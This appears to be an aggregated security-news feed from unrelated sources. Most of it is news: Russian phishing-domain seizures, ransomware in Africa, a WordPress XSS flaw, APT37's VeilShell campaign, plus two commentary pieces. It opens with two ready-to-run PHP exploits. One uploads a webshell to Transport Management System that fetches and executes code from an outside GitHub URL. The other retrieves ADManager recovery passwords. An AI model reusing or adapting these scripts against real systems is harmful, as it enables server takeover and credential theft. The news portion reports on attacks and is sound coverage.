Transport Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Transport Management System 1.0 php code injection Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 2.php 127.0.0.1/Transport-Management/[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'submit' => '',        'vehregno' => '3',    'vehchesis' => '00213771818860',    'vehdescription' => 'hacked by indoushka',    'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),            'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/newvehicle.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/vehicle picture/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Transport Management System 1.0 Code Injection

ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.

    =============================================================================================================================================| # Title     : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.manageengine.com/products/ad-manager/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a  Password Hash disclosure vulnerability..[+] save code as poc.php .[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>[+] PayLoad :<?php// تعطيل تحذيرات HTTPSerror_reporting(0);function getPass($target, $auth, $user, $password) {    // تهيئة Session    $ch = curl_init();        // تحويل نوع المصادقة إذا كان ADManager    if (strtolower($auth) == 'admanager') {        $auth = 'ADManager Plus Authentication';    }        // بيانات تسجيل الدخول    $data = http_build_query([        "is_admp_pass_encrypted" => "false",        "j_username" => $user,        "j_password" => $password,        "domainName" => $auth,        "AUTHRULE_NAME" => "ADAuthenticator"    ]);        // إعدادات الطلب    $url = $target . 'j_security_check?LogoutFromSSO=true';    curl_setopt($ch, CURLOPT_URL, $url);    curl_setopt($ch, CURLOPT_POST, true);    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_HTTPHEADER, [        "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",        "Content-Type: application/x-www-form-urlencoded"    ]);    // إرسال الطلب    $response = curl_exec($ch);        // التحقق من المصادقة    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);    if (strpos($response, 'Cookie') !== false) {        echo "[+] Authentication successful!\n";    } elseif ($http_code == 200) {        echo "[-] Invalid login name/password!\n";        exit(0);    } else {        echo "[-] Something went wrong!\n";        exit(1);    }    // استرجاع كلمة المرور    for ($i = 1; $i <= 5; $i++) {        echo "[*] Trying to fetch recovery password for domainId: $i!\n";        $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';        curl_setopt($ch, CURLOPT_URL, $passUrl);        curl_setopt($ch, CURLOPT_POST, false);        $passResponse = curl_exec($ch);                if ($passResponse) {            echo $passResponse . "\n";        }    }    curl_close($ch);}function get_args() {    global $argv;    $args = [        'target' => '',        'auth' => '',        'user' => '',        'password' => ''    ];    for ($i = 1; $i < count($argv); $i++) {        switch ($argv[$i]) {            case '-t':            case '--target':                $args['target'] = $argv[++$i];                break;            case '-a':            case '--auth':                $args['auth'] = $argv[++$i];                break;            case '-u':            case '--user':                $args['user'] = $argv[++$i];                break;            case '-p':            case '--password':                $args['password'] = $argv[++$i];                break;        }    }    return $args;}function main() {    $args = get_args();    if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {        echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";        exit(1);    }    getPass($args['target'], $args['auth'], $args['user'], $args['password']);}main();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ManageEngine ADManager 7183 Password Hash Disclosure

DoJ and Microsoft seized over 100 sites used by Russian hackers for phishing campaigns targeting the U.S. The…

DoJ and Microsoft seized over 100 sites used by Russian hackers for phishing campaigns targeting the U.S. The coordinated effort aims to disrupt state-backed cyber attacks and protect sensitive American data.

The U.S. Department of Justice (DoJ) has revealed that it successfully took down 41 malicious websites allegedly operated by Russian intelligence agents and their collaborators. The seized domains were reportedly being used to conduct malicious cyber activities, including targeting American institutions, in what authorities have called a “sophisticated and ongoing” campaign to exploit sensitive data.

According to the DoJ, the seized domains were being used by a group known as the “**Callisto Group**,” an operational unit within the Russian Federal Security Service (FSB). The group is accused of orchestrating spear-phishing campaigns—targeted email attacks designed to deceive recipients into revealing login credentials. The aim was to gain unauthorized access to confidential information from government entities and other high-value targets.

This action is part of a bigger effort to fight cybercrime in the U.S. and lines up with Microsoft’s latest **announcement** about taking control of 66 similar domains managed by the same group.

Deputy Attorney General Lisa Monaco highlighted the importance of the collaborative effort, **saying**, “Today’s seizure of 41 internet domains reflects the Justice Department’s cyber strategy in action—using every tool at our disposal to disrupt and deter state-sponsored cyber actors.”

She emphasised and claimed that the Russian government used these domains to impersonate legitimate entities and lure victims into a trap. With the help of private partners like Microsoft, Monaco stated that the Department of Justice is committed to exposing such actors and stripping them of their illicit capabilities.

****Microsoft’s Role in the Joint Effort****

Microsoft played a key role in this operation, filing a civil suit to seize 66 domains also linked to the Callisto Group, which Microsoft internally refers to as “Star Blizzard.” The company’s Threat Intelligence unit reported that, between January 2023 and August 2024, Star Blizzard was involved in targeting over 30 civil society organizations, including journalists, think tanks, and NGOs, in an attempt to exfiltrate sensitive information.

> _“Together, we have seized more than 100 websites. Rebuilding infrastructure takes time, absorbs resources, and costs money. By collaborating with the DOJ, we have been able to expand the scope of disruption and seize more infrastructure, enabling us to deliver greater impact against Star Blizzard “While we expect Star Blizzard to always be establishing new infrastructure, today’s action impacts their operations at a critical point in time when foreign interference in U.S. democratic processes is of utmost concern.”_
> 
> Microsoft

The **affidavit** (PDF) supporting the domain seizures reveals a sophisticated operation targeting numerous individuals and organizations, ranging from former U.S. government employees to defence contractors and Department of Energy staff. These actions, authorities say, were part of an effort to infiltrate key sectors and gather valuable intelligence.

****Callisto Group****

The Callisto Group, tracked by Microsoft under the alias “Star Blizzard” (previously known as SEABORGIUM or COLDRIVER), has become notorious for its consistent use of **spear-phishing tactics**.

These attacks often disguise themselves as legitimate communications, tricking victims into providing login information. The group reportedly targeted individuals linked to the U.S. Intelligence Community, as well as contractors working with sensitive U.S. agencies.

Back in December 2023, two individuals associated with the Callisto Group were **charged** by the DoJ: Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, both linked to FSB Center 18. The indictment accused them of participating in a coordinated hacking campaign against U.S., U.K., NATO member nations, and Ukrainian entities, on behalf of the Russian government.

A phishing email from Callisto Group (Via Microsoft)

It is also worth mentioning that in August last year, INTERPOL dismantled the infamous ’**16shop**’ which served as a Phishing-as-a-Service (PaaS) platform. This was followed by the seizure of another Phishing-as-a-Service platform **BulletProftLink** in November 2023.

Commenting on this, **Casey Ellis**, Founder and Chief Strategy Officer at Bugcrowd, a San Francisco, Calif.-based leader in crowdsourced cybersecurity said, _“_The takedown serves a few purposes: Disrupting existing operations, their infrastructure, and their operatives. It puts ColdRiver, and others, “on notice” that their activities are being detected and that they aren’t operating with impunity, which has the benefit of sowing internal doubt and confusion within the operation, which will chill their activities for a while._“_

_“_Importantly, the announcement and the amount of signalling the USG is doing around this takedown is intended to send a message, both to foreign adversaries as well as those being protected here – Russia is a real adversary, with real cyber-operations underway_,”_ Casey warned.

This latest seizure goes on to show how authorities are not only responding to cyberattacks but also proactively dismantling the infrastructure behind these attacks. Additionally, the ongoing collaboration between the Justice Department, FBI, Microsoft, and other agencies also shows how the government and private sector together can curb cybercrime faster.

1.  **Finnish Dark Web Marketplace PIILOPUOTI Seized**
2.  **Ragnar Locker Ransomware Dismantled, Key Suspect Arrested**
3.  **Indian call center seized over Amazon scam against US citizens**
4.  **Ukrainian Hackers Breach Email of APT28 Leader, Wanted by FBI**
5.  **SSNDOB Cybercrime Market Seized in Intl. Coordinated Operation**

DoJ, Microsoft Seize 100 Russian Phishing Sites Targeting US

Cloud-based solutions are transforming the software quality assurance (QA) industry. As organizations increasingly migrate their development and verification…

Cloud-based solutions are transforming the software quality assurance (QA) industry. As organizations increasingly migrate their development and verification processes to the cloud, QA teams gain access to unprecedented scalability, flexibility, and efficiency. This shift is enabling teams to optimize their workflows, better handle growing demands, and respond more swiftly to project needs.

Companies can now accelerate their evaluation cycles, enhance collaboration, and reduce costs, all while leveraging the latest technological advancements. Cloud-based platforms offer a unified environment where QA professionals, developers, and managers can work together seamlessly, regardless of their physical location. This transformation is rapidly becoming a cornerstone of modern software development.

According to AI-powered QA management tool and service provider Aqua Cloud, addressing key pain points in the software validation process requires thorough diligence. Therefore, teams must focus on higher-value activities by simplifying repetitive processes using Aqua Cloud’s AI-powered capabilities and automation tools.

Centralizing quality management in a single ecosystem helps to remove silos and guarantees seamless processes, hence greatly lowering the inefficiencies often afflicting dispersed QA systems.

****The Scalability and Flexibility of Cloud-Based Quality Assurance****

One of the primary advantages of cloud-based solutions is the ability to scale QA environments quickly and efficiently. Traditional on-premise infrastructure requires significant investment in hardware and maintenance, which limits the capacity to scale as demand increases. 

In contrast, cloud-based platforms allow QA teams to scale up or down depending on their current needs, whether they handle small-scale projects or manage enterprise-level applications. This scalability improves resource allocation and reduces the time needed to set up validation environments.

Additionally, cloud-based platforms provide unmatched flexibility. Teams can access QA environments from anywhere, facilitating global collaboration. As remote work becomes more common, the cloud’s accessibility ensures that quality assurance professionals and developers can work together without geographic constraints. This collaborative environment fosters better communication and faster resolution of issues, helping to meet tight development deadlines.

****Cost Efficiency Through Pay-as-You-Go Models****

Cost savings are a critical factor driving the adoption of cloud-based QA solutions. Traditional quality assurance infrastructures require substantial upfront capital investment in hardware, licenses, and ongoing maintenance. Cloud-based platforms, on the other hand, operate on a pay-as-you-go model, meaning that organizations only pay for the resources they use. This allows businesses to optimize their budgets, especially when workloads fluctuate.

The cloud also eliminates the need for dedicated physical infrastructure, reducing not only hardware costs but also associated overheads like energy consumption and IT staff for maintenance. The savings can be redirected toward improving other areas of software development and quality assurance, such as hiring additional QA specialists or investing in advanced tools.

****Enhanced Cooperation and Automation****

In today’s fast-paced software development lifecycle (SDLC), collaboration is essential to delivering high-quality software products. Cloud-based platforms enhance collaboration by providing a centralized repository where all team members can access QA data in real-time. This transparency ensures that everyone — from quality managers to QA professionals and developers — clearly understands the progress and can act swiftly to resolve issues.

Automation is another significant benefit offered by cloud-based solutions. Automated tools integrated within these platforms reduce the need for manual intervention, allowing QA teams to run extensive validation cases without delays. This is particularly useful for repetitive tasks like regression checks, where automation can dramatically cut down the time required for execution. As a result, QA teams can shift their focus to more critical aspects of the process, such as exploratory assessments or improving coverage.

****Improved Security and Compliance****

Security is a primary concern for businesses, particularly those in regulated industries such as healthcare and finance. Cloud-based solutions have evolved to offer strong security features that ensure data integrity and confidentiality. Leading cloud service providers often offer advanced encryption, multi-factor authentication, and compliance with international security standards.

Moreover, cloud-based QA platforms help organizations meet regulatory requirements by providing audit-ready documentation and traceability. Every action within the quality assurance process is logged, ensuring that companies can prove compliance during audits. This feature is invaluable for industries requiring strict data handling and security protocols.

****Integration with Existing Tools****

Another major advantage of cloud-based solutions is their ability to integrate seamlessly with existing tools and frameworks used in the software development lifecycle. Many QA teams rely on a mix of open-source and proprietary tools, which can be difficult to synchronize when operating on traditional infrastructures. Cloud platforms simplify this process by offering pre-built integrations with popular tools like Jira, Jenkins, and Azure DevOps.

This interoperability reduces the complexity of managing multiple systems and eliminates data silos. When all tools are connected within the cloud ecosystem, it becomes easier for teams to share information, monitor performance, and ensure that the entire software development process runs smoothly.

Cloud-based solutions are transforming the infrastructure of software quality assurance, offering unmatched scalability, flexibility, and cost-efficiency. As businesses continue to embrace digital transformation, cloud-based QA solutions will play an increasingly vital role in ensuring the success of software development projects, eliminating inefficiencies, and taking away the pains that have traditionally been associated with the quality assurance process.

1.  Best Practices for Cloud Computing Security
2.  How To Safeguard Your Data With Cloud MRP System
3.  The Role of DevOps in Streamlining Cloud Migration Processes
4.  Insights on Google Cloud Backup and Disaster Recovery Service
5.  Risk Management Strategies: Incorporating Cloud WAFs into Plan

How Cloud-Based Solutions Are Transforming Software Quality Assurance

Thoughtfully applied, humor breaks through security fatigue, increases engagement, and fosters a culture of security awareness.

Akhil Mittal, Senior Manager, Synopsys Software Integrity Group

October 4, 2024

5 Min Read

Source: M-SUR via Alamy Stock Photo

COMMENTARY

In the high-pressure world of cybersecurity, daily headlines about breaches, ransomware, and phishing threats create a sense of urgency and tension. But what if one of the most effective tools for defense wasn't just technology, but humor? While it may seem unexpected, humor is emerging as a powerful asset in security training and culture-building. It boosts employee engagement, improves retention of key security concepts, and fosters a resilient security culture — ultimately strengthening an organization's defenses. 

However, humor isn't just about laughs — it's about combating challenges like security fatigue and ineffective training. As cyber threats evolve, the human element remains one of the weakest links. Humor can address that, but it must be carefully navigated. 

**Why Humor Works in Security Training**

According to a study from CompTIA, the human element accounts for the root cause of 52% of data breaches. Despite this, traditional cybersecurity training often fails to engage employees, resulting in low retention and inconsistent application of critical security behaviors. Dry, repetitive sessions packed with jargon cause employees to tune out — this is where humor comes in. 

According to TrainSmart, humor in training can boost retention and create a more relaxed learning environment. Research by Edutopia supports this, showing humor activates dopamine pathways, essential for motivation and memory retention. 

Imagine a monotonous security session versus a phishing simulation email from "IT Support" asking for your password to "upgrade the Internet." Humor transforms routine tasks into memorable learning experiences. 

**Real-World Examples**

Financial institutions and organizations are increasingly turning to gamification to enhance cybersecurity awareness. For example, some organizations have launched superhero-themed phishing campaigns where employees help fictional heroes identify threats, making training more interactive and fun. According to the Gamification at Work Survey by Talent LMS, 83% of participants reported feeling more motivated with gamified training, while 87% saw improvements in productivity and engagement. Additionally, 82% mentioned they felt happier at work due to these engaging methods. Similarly, some organizations use "bad password hall of fame" competitions, where employees guess the worst passwords ever used. These humorous contests make lessons about password strength more memorable, reinforcing security practices. Notably, 80% of organizations that implemented awareness training reported a reduction in phishing susceptibility, showcasing the effectiveness of these innovative approaches. 

**Reducing Security Fatigue**

Security fatigue is a growing issue in corporate environments. Employees face constant alerts, password updates, and phishing warnings, which can lead to negligence. 

Injecting humor into routine security tasks — like humorous phishing emails or lighthearted reminders — provides much-needed relief, keeping employees engaged without overwhelming them.

**Humor as a Solution for Remote Work**

The shift to remote work has highlighted the importance of engaging employees in security practices. Isolated from their IT teams, remote workers have become both the first and last lines of defense. However, 60% of remote employees feel disconnected from their company's cybersecurity efforts, according to Ponemon. In this environment, humor helps combat burnout, while reinforcing critical cybersecurity behaviors. 

**Risks and Challenges**

While humor can be effective, it also carries risks. If not implemented carefully, humor may trivialize serious threats, leading employees to view cybersecurity risks as less critical. Balance is key — humor should engage without undermining the importance of vigilance. 

Moreover, not all humor works in every context, particularly across diverse cultures. A cartoon-style phishing simulation may succeed in one region but be inappropriate elsewhere. To avoid alienating employees, it's crucial to test humor-based campaigns with different cultural groups before deployment. 

It's also critical to measure the effectiveness of humor in security training. Organizations should track phishing reporting rates, training completion, and quiz scores to assess engagement and overall security posture. 

**Learning From Mistakes **

Not all humor-based campaigns are successful. For instance, one company used sarcastic dark humor in its training sessions, which led to complaints from employees who felt the tone was dismissive of real security risks. The lesson? Humor that fails to take security seriously can do more harm than good. 

**Actionable Takeaways**

For organizations looking to enhance cybersecurity training with humor, here are some practical steps: 

*   Incorporate humor in training: Introduce humor into phishing simulations and training exercises to boost engagement and retention. 
    

*   Gamify security awareness: Create competitions or leaderboards where employees race to spot phishing attempts, using humor to reduce monotony. 
    

*   Test for cultural sensitivity: Ensure humor resonates globally by testing content with various employee groups before rolling it out. 
    

*   Track key metrics: Monitor phishing reporting rates, training completion, and engagement metrics to assess the effectiveness of humor in cybersecurity efforts.
    

**Conclusion**

Cybersecurity is serious, but it doesn't have to be boring. Thoughtfully applied, humor breaks through security fatigue, increases engagement, and fosters a culture of security awareness. By balancing humor and seriousness, organizations can strengthen their defenses while keeping employees alert and engaged. Now is the time to inject levity into cybersecurity efforts — without losing sight of vigilance. 

**About the Author**

Senior Manager, Synopsys Software Integrity Group

Akhil Mittal is a recognized cybersecurity leader with more than two decades of experience in application security, cloud security, and DevSecOps. As a Gartner Cybersecurity ambassador and senior manager at Synopsys, he leads key security initiatives, helping global organizations strengthen their defenses against advanced cyber threats. Akhil has worked closely with chief information security officers (CISOs) and executive leadership to align security strategies with business goals, ensuring robust protection across industries. He also contributes his expertise through leading cybersecurity publications and serves as a judge for top industry awards and hackathons. Certified in CISSP and CCSP, his work continues to shape the future of cybersecurity, driving innovation and resilience worldwide.

Cybersecurity Is Serious — but It Doesn't Have to Be Boring

Microsoft and the U.S. Department of Justice (DoJ) on Thursday announced the seizure of 107 internet domains used by state-sponsored threat actors with ties to Russia to facilitate computer fraud and abuse in the country.
"The Russian government ran this scheme to steal Americans' sensitive information, using seemingly legitimate email accounts to trick victims into revealing account credentials

Phishing Attack / Cybercrime

Microsoft and the U.S. Department of Justice (DoJ) on Thursday announced the seizure of 107 internet domains used by state-sponsored threat actors with ties to Russia to facilitate computer fraud and abuse in the country.

"The Russian government ran this scheme to steal Americans' sensitive information, using seemingly legitimate email accounts to trick victims into revealing account credentials," said Deputy Attorney General Lisa Monaco.

The activity has been attributed to a threat actor called COLDRIVER, which is also known by the names Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), Dancing Salome, Gossamer Bear, Iron Frontier, Star Blizzard (formerly SEABORGIUM), TA446, and UNC4057.

Active since at least 2012, the group is assessed to be an operational unit within Center 18 of the Russian Federal Security Service (FSB).

In December 2023, the U.K. and U.S. governments sanctioned two members of the group – Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets – for their malicious credential harvesting activities and spear-phishing campaigns. Subsequently, in June 2024, the European Council imposed sanctions against the same two individuals.

The DoJ said the newly seized 41 domains were used by the threat actors to "commit violations of unauthorized access to a computer to obtain information from a department or agency of the United States, unauthorized access to a computer to obtain information from a protected computer, and causing damage to a protected computer."

The domains are alleged to have been used as part of a spear-phishing campaign targeting the email accounts of the U.S. government and other victims with the goal of gathering credentials and valuable data.

Parallel to the announcement, Microsoft said it filed a corresponding civil action to seize 66 additional internet domains used by COLDRIVER to single out over 30 civil society entities and organizations between January 2023 and August 2024.

This included NGOs and think tanks that support government employees and military and intelligence officials, particularly those providing support to Ukraine and in NATO countries such as the U.K. and the U.S. COLDRIVER's targeting of NGOs was previously documented by Access Now and the Citizen Lab in August 2024.

"Star Blizzard's operations are relentless, exploiting the trust, privacy, and familiarity of everyday digital interactions," Steven Masada, assistant general counsel at Microsoft's Digital Crimes Unit (DCU), said. "They have been particularly aggressive in targeting former intelligence officials, Russian affairs experts, and Russian citizens residing in the U.S."

The tech giant said it identified 82 customers who have been targeted by the adversary since January 2023, demonstrating a tenacity on the group's part to evolve with new tactics and achieve their strategic goals.

"This frequency underscores the group's diligence in identifying high-value targets, crafting personalized phishing emails, and developing the necessary infrastructure for credential theft," Masada said. "Their victims, often unaware of the malicious intent, unknowingly engage with these messages leading to the compromise of their credentials."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

U.S. and Microsoft Seize 107 Russian Domains in Major Cyber Fraud Crackdown

The booming economies of Africa, rich in natural resources and brimming with potential, are attracting not just investors but also cybercriminals.

Source: Skorzewiak via Alamy Stock Photo

The industry consensus about ransomware is that it's not going away anytime soon, evidenced by the consistent growth of ransomware attacks over the past decade. We've seen some of the biggest ransomware attacks in history — including the JBS, Colonial Pipeline, and Equifax breaches — over the past five years. What's more, between 2023 and 2024, there was an 81% year-on-year jump in the number of recorded ransomware attacks, according to cybersecurity research firm Black Kite.

And according to a report earlier this year by cybersecurity research firm Performanta, ransomware gangs have a new strategy: Ransomware-as-a-service (RaaS) organizations are focusing on African nations as initial targets for nation-state attacks before launching malicious campaigns in more developed climes.

But what makes Africa a choice destination for these so-called "RaaS gangs," and what does this mean for the burgeoning economies on the continent?

**Why Africa?**

The booming economies of Africa, rich in natural resources and brimming with potential, are attracting not just investors but also cybercriminals. Performanta's report, which shows that Africa is increasingly becoming a testing ground for ransomware attacks, raises serious concerns for the continent's future and underscores the urgent need for collaboration among African states, corporations, and the West.

One draw for the cybergangs is the continent's overall low levels of cybersecurity strategy at the national level. In the 2024 edition of the International Telecommunication Union's Global Cybersecurity Index, only nine out of 44 countries in Africa qualified for the first or second tier of cybersecurity maturity. While this is an improvement over the previous report's rankings, that still leaves swathes of the continent less prepared.

Funsho Richard, a senior cybersecurity analyst and consultant, agrees with Performanta's findings.

"Africa's potential for profitable attacks amidst its digital growth is a magnet for cybercriminals," he says. Ransomware gangs and nation-state actors are exploiting the continent's weaker cybersecurity defenses to refine their methods in a "lower-risk environment" before launching attacks on better-secured developed nations.

This approach makes perfect sense from the attackers' perspective, as Gal Nakash, co-founder and CPO at identity-based SaaS security company Reco, explains.

"Building a sophisticated testing environment for a campaign is challenging," Nakash says. "Leveraging less interesting or poorly secured victims is more effective and increases the likelihood of remaining undetected by security tools."

In June, South Africa's National Health Laboratory Service (NHLS) confirmed it was dealing with a ransomware attack that significantly affected the dissemination of lab results as the country was responding to an outbreak of mpox (previously known as monkeypox). The NHLS runs 265 laboratories across South Africa that provide testing services for public healthcare facilities in the country's nine provinces. The spokesperson declined to say which ransomware group was behind the incident or whether a ransom was paid.

**Signs and Guardrails**

So how can African businesses identify these potential "ransomware testing" campaigns? Richard points out that, unlike traditional ransomware attacks that target specific industries like finance or energy, these campaigns might target a wider range of businesses.

Traditionally, ransomware gangs have a well-defined appetite: high-value sectors like finance, manufacturing, and energy. A recent surge in attacks targeting a wider range of businesses across various industries in Africa could be a red flag, indicating a testing campaign in progress.

Performanta's research also validates this concern. The report reveals a "large increase in financial/banking trojans with a 59% increase in Kenya and a 32% increase in Nigeria across a single quarter," suggesting gangs are casting a wider net.

Performanta's report suggests African organizations may not be fully prepared for this shift in attack tactics. While Nakash expresses confidence in the capabilities of modern cybersecurity solutions like extended detection and response/endpoint detection and response (XDR/EDR), he acknowledges a lack of widespread adoption. But he says that businesses that regularly update their cybersecurity controls and policies can stop attackers dead in their tracks.

"This includes maintaining visibility into their entire network environment, encompassing cloud, SaaS \[software-as-a-service\], on-premises infrastructure, and all the applications they use daily," Nakash says. "Critical applications should be mapped, and robust policies and alert notifications should be set up to identify and address any violations or misconfigurations that could create potential security vulnerabilities."

However, to spot the wider trend of test campaigns requires national coordination and strategy, as well as regional cooperation. The Africa Center for Strategic Studies cites several regional initiatives, such as Afripol, but warns that only 17 countries on the continent even have a national cybersecurity strategy.

**Building a Strong Defense**

What businesses on the continent need to stay cybersafe is a foundational approach — doing the basic things the right way. Ensuring that all configurations adhere to best security practices and setting up alert notifications for any suspicious activity are essential steps to prevent potential threats.

"Organizations need thorough visibility into their entire network environment, including cloud and on-premises infrastructure," Nakash says.

The fight against cybercrime requires a united front, says Guy Golan, executive chairman and CEO at Performanta.

"The West and Africa must implement long-term collaborative efforts to build a strong defense against this threat," he says. By sharing knowledge, resources, and best practices, both continents can work together to create a more secure digital landscape for all.

Building resilience against these attacks isn't just about protecting individual businesses; it's about safeguarding the future of Africa's booming digital economy.

"The solution lies in long-term collaborative efforts. Only then can we effectively combat this growing threat," says Richard.

**About the Author**

Contributing Writer

Kolawole Samuel Adebayo is a Harvard-trained tech entrepreneur, tech enthusiast, tech writer/journalist, and an executive ghostwriter. He has 10+ years of experience covering various tech news stories, writing thought leadership blogs, reports, datasheets, and case studies. His areas of expertise include cybersecurity, AI, ML, DevOps, blockchain, metaverse, and big data for C-level executive audiences. He has written for several publications, including VentureBeat, RSI Security, NWTechs, WATI Security, Draft.dev, Codecov, Teleport, Doppler, HotCars, and many more. He is also an award-winning poet, with works published in several journals around the world.

Criminals Are Testing Their Ransomware Campaigns in Africa

A new high-severity security flaw has been disclosed in the LiteSpeed Cache plugin for WordPress that could enable malicious actors to execute arbitrary JavaScript code under certain conditions.
The flaw, tracked as CVE-2024-47374 (CVSS score: 7.2), has been described as a stored cross-site scripting (XSS) vulnerability impacting all versions of the plugin up to and including 6.5.0.2.
It was

Website Security / Vulnerability

A new high-severity security flaw has been disclosed in the LiteSpeed Cache plugin for WordPress that could enable malicious actors to execute arbitrary JavaScript code under certain conditions.

The flaw, tracked as **CVE-2024-47374** (CVSS score: 7.2), has been described as a stored cross-site scripting (XSS) vulnerability impacting all versions of the plugin up to and including 6.5.0.2.

It was addressed in version 6.5.1 on September 25, 2024, following responsible disclosure by Patchstack Alliance researcher TaiYou.

"It could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request," Patchstack said in a report.

The flaw stems from the manner in which the plugin the "X-LSCACHE-VARY-VALUE" HTTP header value is parsed without adequate sanitization and output escaping, thereby allowing for injection of arbitrary web scripts.

That said, it's worth pointing out that the Page Optimization settings "CSS Combine" and "Generate UCSS" are required to enable the exploit to be successful.

Also called persistent XSS attacks, such vulnerabilities make it possible to store an injected script permanently on the target website's servers, such as in a database, in a message forum, in a visitor log, or in a comment.

This causes the malicious code embedded within the script to be executed every time an unsuspecting site visitor lands on the requested resource, for instance, the web page containing the specially crafted comment.

Stored XSS attacks can have serious consequences as they could be weaponized to deliver browser-based exploits, steal sensitive information, or even hijack an authenticated user's session and perform actions on their behalf.

The most damaging scenario is when the hijacked user account is that of a site administrator, thereby allowing a threat actor to completely take control of the website and stage even more powerful attacks.

WordPress plug-ins and themes are a popular avenue for cybercriminals looking to compromise legitimate websites. With LiteSpeed Cache boasting over six million active installations, flaws in the plugin pose a lucrative attack surface for opportunistic attacks.

The latest patch arrives nearly a month after the plugin developers addressed another flaw (CVE-2024-44000, CVSS score: 7.5) that could allow unauthenticated users to take control of arbitrary accounts.

It also follows the disclosure of an unpatched critical SQL injection flaw in the TI WooCommerce Wishlist plugin (CVE-2024-43917, CVSS score: 9.8) that, if successfully exploited, permits any user to execute arbitrary SQL queries in the database of the WordPress site.

Another critical security vulnerability concerns the Jupiter X Core WordPress plugin (CVE-2024-7772, CVSS score: 9.8) that allows unauthenticated attackers to upload arbitrary files on the affected site's server, potentially leading to remote code execution.

It has been fixed in version 4.7.8, along with a high-severity authentication bypass flaw (CVE-2024-7781, CVSS score: 8.1) that "makes it possible for unauthenticated attackers to log in as the first user to have logged in with a social media account, including administrator accounts," Wordfence said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

WordPress LiteSpeed Cache Plugin Security Flaw Exposes Sites to XSS Attacks

It's North Korea versus Cambodia, with Windows default settings and sheer patience allowing the bad guys to avoid easy detection.

Source: motioncenter via Alamy Stock Photo

The North Korean state-sponsored threat actor known as APT37 has been carefully spreading a novel backdoor, dubbed "VeilShell." Of note is its target: Most North Korean advanced persistent threats (APTs) have a history of targeting organizations in South Korea or Japan, but APT37's latest campaign seems to be directed at a nation Kim Jong-Un has more complex relations with: Cambodia.

While Pyongyang still maintains an embassy in Phnom Penh and the two nations share a history of Soviet ties in the region, the modern-day relationship between the two is far from cozy. The DPRK's nuclear weapons program, ongoing missile tests, cyber activities, and general aggression towards its neighbors contradicts Cambodia's stance on weapons of mass destruction (WMDs) and its call for meaningful diplomatic dialogue between all countries in the region, observers in the region have noted.

That wariness has drawn the attention of the North Korean regime, according to Securonix, which has flagged a new campaign called "Shrouded#Sleep" circulating against Cambodian organizations.

Securonix did not share detailed victimology, but to lure in targets, APT37 (aka InkSquid, RedEyes, BadRAT, Reaper, ScarCruft, and Ricochet Chollima) has been spreading malicious emails relating to Cambodian affairs, and in Cambodia's primary language, Khmer. One lure for instance offers recipients access to a spreadsheet related to annual income in US dollars across various sectors in the country, such as social work, education, health, and agriculture.

Related:China-Backed APT Group Culling Thai Government Data

Hidden in these emails are maliciously crafted shortcut files concealing the backdoor, used to establish quiet persistence in targeted networks.

**Shrouded#Sleep's Stealthy Shortcuts**

